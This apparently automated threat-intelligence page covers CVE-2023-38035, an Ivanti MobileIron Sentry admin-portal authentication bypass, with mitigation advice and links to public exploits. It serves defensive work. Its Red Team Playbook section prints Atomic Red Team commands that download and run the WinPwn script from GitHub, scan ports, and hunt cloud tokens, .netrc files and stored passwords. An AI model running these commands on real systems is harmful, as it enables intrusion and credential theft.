CVE-2023-38035
Overview
This vulnerability is an authentication bypass caused by an insufficiently restrictive Apache HTTPD configuration within the MICS Admin Portal component of Ivanti MobileIron Sentry. The root cause lies in misconfigured access controls that fail to enforce authentication on administrative interface endpoints. This flaw affects versions 9.18.0 and earlier, specifically impacting the security enforcement mechanism of the administrative web interface.
Vulnerability Description
A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.
Impact
An attacker can gain unauthorized administrative access to the Ivanti MobileIron Sentry system without any authentication or user interaction. This access enables the attacker to perform administrative actions, potentially leading to full system compromise, unauthorized data access, and lateral movement within the affected environment. The vulnerability exposes critical management interfaces, risking operational disruption and sensitive data breaches.
Solution
Ivanti has released security updates addressing this vulnerability in versions later than 9.18.0. Administrators should apply the latest patches as detailed in Ivanti’s advisory available at https://forums.ivanti.com/s/article/CVE-2023-38035-API-Authentication-Bypass-on-Sentry-Administrator-Interface. The vendor recommends updating Ivanti MobileIron Sentry to a fixed version and verifying Apache HTTPD configurations to enforce strict authentication controls on administrative endpoints.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in the MICS Admin Portal of Ivanti MobileIron Sentry versions 9.18.0 and below stems from an insufficiently restrictive configuration of the Apache HTTPD server. This misconfiguration allows unauthorized users to bypass authentication controls, effectively granting them administrative access to the interface without proper credentials. The issue arises from the failure to enforce stringent access controls, which should ideally limit administrative functionalities to authenticated users only. As a result, attackers can exploit this weakness to gain control over the administrative portal, potentially leading to unauthorized changes in configurations, data exposure, or even complete system compromise.
Attack vectors for this vulnerability are particularly concerning due to the ease with which an attacker can exploit it. An adversary with basic knowledge of web server configurations can leverage automated tools or manual techniques to probe the administrative interface. Once they identify the lack of proper authentication checks, they can access sensitive functionalities, including user management, device policies, and system settings. Scenarios may include an attacker altering device compliance policies or deploying malicious configurations across managed devices, which could lead to widespread security breaches within an organization’s mobile device management framework.
The real-world impact of this vulnerability is significant, especially for organizations relying on Ivanti MobileIron Sentry for managing their mobile devices. Given the high CVSS score of 9.8, the risk associated with this vulnerability is categorized as critical. Successful exploitation can lead to severe consequences, including data breaches, unauthorized access to sensitive corporate information, and potential regulatory non-compliance. The business risks extend beyond immediate financial losses, as organizations may face reputational damage, loss of customer trust, and legal ramifications stemming from data protection violations. The interconnected nature of mobile device management means that a breach could also facilitate lateral movement within the corporate network, amplifying the potential damage.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First and foremost, it is essential to review and harden the Apache HTTPD configuration to ensure that only authenticated users can access administrative functionalities. Regular security audits and vulnerability assessments should be conducted to identify misconfigurations and other security weaknesses. Additionally, organizations should deploy intrusion detection systems (IDS) to monitor for unauthorized access attempts and anomalous activities within the administrative portal. Implementing robust logging and alerting mechanisms can provide early warning signs of potential exploitation attempts.
In conclusion, the vulnerability in the MICS Admin Portal of Ivanti MobileIron Sentry represents a critical security risk that organizations must address promptly. By understanding the technical details, potential attack vectors, and real-world implications of this vulnerability, cybersecurity professionals can develop effective detection and mitigation strategies. Organizations must prioritize securing their administrative interfaces to protect against unauthorized access and ensure the integrity of their mobile device management systems. Proactive measures, combined with continuous monitoring and assessment, are essential to safeguarding sensitive data and maintaining operational resilience in an increasingly threat-laden digital landscape.
CSURFACE threat intelligence has identified a notable surge in detection activity related to CVE-2023-38035, indicating increased adversary interest and potential exploitation attempts targeting the Ivanti MobileIron Sentry administrative interface. This uptick coincides with the availability of multiple new proof-of-concept exploits and a Metasploit module, which collectively lower the barrier for threat actors to conduct authentication bypass and remote code execution attacks. Although the overall exploit trend remains stable, the qualitative increase in telemetry suggests a growing operational focus by ransomware-linked groups such as 0apt, underscoring the vulnerability’s continued relevance in active campaigns. This evolving landscape elevates the threat level, reinforcing the criticality of CVE-2023-38035 as a high-risk vector for unauthorized access and system compromise within affected environments.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ivanti | Mobileiron Sentry | All |
cpe:2.3:a:ivanti:mobileiron_sentry:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Ivanti Sentry MICSLogService Auth Bypass resulting in RCE (CVE-2023-38035)
exploits/linux/http/ivanti_sentry_misc_log_service
|
Zach Hanley, James Horseman, jheysel-r7 | Unknown | unix, linux | View |
GitHub PoCs (3)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
horizon3ai/CVE-2023-38035
Ivanti Sentry CVE-2023-38035
|
horizon3ai | 40 | 12 | 2023-08-23 | View |
|
LeakIX/sentryexploit
CVE-2023-38035 Recon oriented exploit, extract company name contact information
|
LeakIX | 7 | 1 | 2023-08-24 | View |
|
mind2hex/CVE-2023-38035-MobileIron-RCE
Script to exploit CVE-2023-38035
|
mind2hex | 1 | 0 | 2023-09-05 | View |
Threat Feed
8 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-38035 |
| forums.ivanti.com |
GitHub CVE
|
https://forums.ivanti.com/s/article/CVE-2023-38035-API-Authentication-Bypass-on-Sentry-Administrator-Interface |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/174643/Ivanti-Sentry-Authentication-Bypass-Remote-Code-Execution.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-38035 |